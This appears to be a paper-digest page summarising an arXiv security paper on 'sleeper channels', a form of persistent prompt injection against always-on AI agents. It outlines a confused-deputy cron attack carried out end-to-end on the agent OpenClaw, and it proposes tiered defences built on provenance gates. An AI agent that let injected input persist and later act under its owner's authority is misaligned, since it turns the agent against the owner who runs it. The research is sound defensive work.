Sleeper Channels and Provenance Gates: Persistent Prompt Injection in Always-on Autonomous AI Agents

May 13, 20262605.13471

cs.CR

TLDR

Persistent prompt injection in always-on AI agents via 'sleeper channels' is identified, and a tiered defense with provenance gates is proposed.

Key contributions

Identifies "sleeper channels," a new persistent prompt injection vulnerability in always-on AI agents.
Demonstrates a confused-deputy cron attack on OpenClaw, showing end-to-end exploitation.
Proposes a tiered defense (D1, D2, D3), with D2 offering a soundness theorem against attacks.
Introduces "provenance gates" using one-shot owner attestations to defeat injection techniques.

Why it matters

This paper identifies "sleeper channels," a critical persistent prompt injection vulnerability in always-on AI agents. Its "provenance gates" defense offers a robust solution against sophisticated attacks, vital for securing autonomous AI systems.

Original Abstract

Always-on AI agents (OpenClaw, Hermes Agent) run as a single persistent process under the owner's identity, folding messaging, memory, self-authored skills, scheduling, and shell into one authority boundary. This configuration opens what we call \emph{sleeper channels}: an untrusted input to one surface persists as a memory, skill, scheduled job, or filesystem patch, then fires later through a different surface with no attacker present. Two independent axes define the class: persistence substrate and firing-separation. We walk a confused-deputy cron attack end-to-end through OpenClaw at a pinned commit. The defense is tiered (D1, D2, D3), and D2 carries a soundness theorem against seven named deployment invariants. D2 keys on a canonical action-instance digest with one-shot owner attestations, defeating paraphrase laundering, multi-input grant reuse, and replay. A companion artifact ships the gate, a static audit over the vendored source, and a runtime adapter realising five of the ten mediation hooks (H1, H2, H3, H6, H9) around the cron path (42 tests, Node~$\geq{}20$, at \href{https://github.com/maloyan/sleeper-channels}{github.com/maloyan/sleeper-channels}). Empirical evaluation is preregistered as follow-on.

View on arXiv Download PDF

📬 Weekly AI Paper Digest

Get the top 10 AI/ML arXiv papers from the week — summarized, scored, and delivered to your inbox every Monday.

TLDR

Key contributions

Why it matters

Original Abstract

📬 Weekly AI Paper Digest

Related papers